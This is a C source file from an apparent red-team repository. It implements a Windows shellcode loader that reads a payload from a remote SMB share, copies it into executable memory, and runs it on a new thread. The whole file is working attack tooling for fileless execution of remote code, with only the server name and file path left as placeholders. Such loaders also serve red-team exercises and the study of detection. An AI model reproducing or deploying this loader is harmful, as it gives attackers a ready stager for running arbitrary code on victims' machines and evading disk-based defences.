zhensolid
/
Home-Grown-Red-Team


			
							123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128
							#include <windows.h>
#include <winnetwk.h>
#include <wchar.h>

// Function prototype for ThreadFunction
DWORD WINAPI ThreadFunction(LPVOID lpParameter);

// Print error messages
void PrintError(const wchar_t* action) {
    wprintf(L"[!] %s Failed With Error : %d \n", action, GetLastError());
}

BOOL FindFileShare(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
    BOOL operationSuccess = TRUE;
    PBYTE allocatedMemory = NULL;

    WCHAR szFullUNCPath[MAX_PATH];
    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);

    wprintf(L"Attempting to open file: %s\n", szFullUNCPath);

    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        PrintError(L"CreateFileW");
        operationSuccess = FALSE;
    }
    else {
        wprintf(L"File opened successfully.\n");

        DWORD fileSize = GetFileSize(hFile, NULL);
        if (fileSize == INVALID_FILE_SIZE) {
            PrintError(L"GetFileSize");
            operationSuccess = FALSE;
        }
        else {
            wprintf(L"File size: %u bytes\n", fileSize);

            allocatedMemory = (PBYTE)LocalAlloc(LPTR, fileSize);
            if (allocatedMemory == NULL) {
                PrintError(L"LocalAlloc");
                operationSuccess = FALSE;
            }
            else {
                wprintf(L"Allocated memory for file content.\n");

                DWORD bytesRead;
                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
                    PrintError(L"ReadFile");
                    operationSuccess = FALSE;
                }

                *binaryData= allocatedMemory;
                *binarySize = bytesRead;
            }
        }

        CloseHandle(hFile);
    }

    return operationSuccess;
}


BOOL ExecuteBinaryInMemory(const PBYTE BinaryData, SIZE_T DataSize) {
    wprintf(L"Executing binary in memory...\n");

    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (pMemory == NULL) {
        PrintError(L"VirtualAlloc");
        return FALSE;
    }

    memcpy(pMemory, BinaryData, DataSize);

    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, 0, NULL);
    if (hThread == NULL) {
        PrintError(L"CreateThread");
        VirtualFree(pMemory, 0, MEM_RELEASE);
        return FALSE;
    }

    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);

    VirtualFree(pMemory, 0, MEM_RELEASE);

    wprintf(L"Execution complete.\n");

    return TRUE;
}

DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
    wprintf(L"Thread started...\n");

    PBYTE BinaryData = (PBYTE)lpParameter;
    typedef void (*FunctionPointer)();
    FunctionPointer pFunction = (FunctionPointer)BinaryData;

    wprintf(L"Calling the shellcode function...\n");

    pFunction();

    wprintf(L"Thread completed.\n");

    return 0;
}

int main() { // Change wmain to main
    LPCWSTR szServer = L"HOSTNAME";
    LPCWSTR szFilePath = L"PATH\\TO\\SHELCODE\\FILE";

    wprintf(L"Attempting to load binary from server %s and file path %s\n", szServer, szFilePath);

    PBYTE Payload;
    SIZE_T PayloadSize;

    BOOL success = FindFileShare(szServer, szFilePath, &Payload, &PayloadSize);

    if (success) {
        wprintf(L"Binary loaded successfully. Executing...\n");

        success = ExecuteBinaryInMemory(Payload, PayloadSize);

        LocalFree(Payload);
    }

    return success ? 0 : 1;
}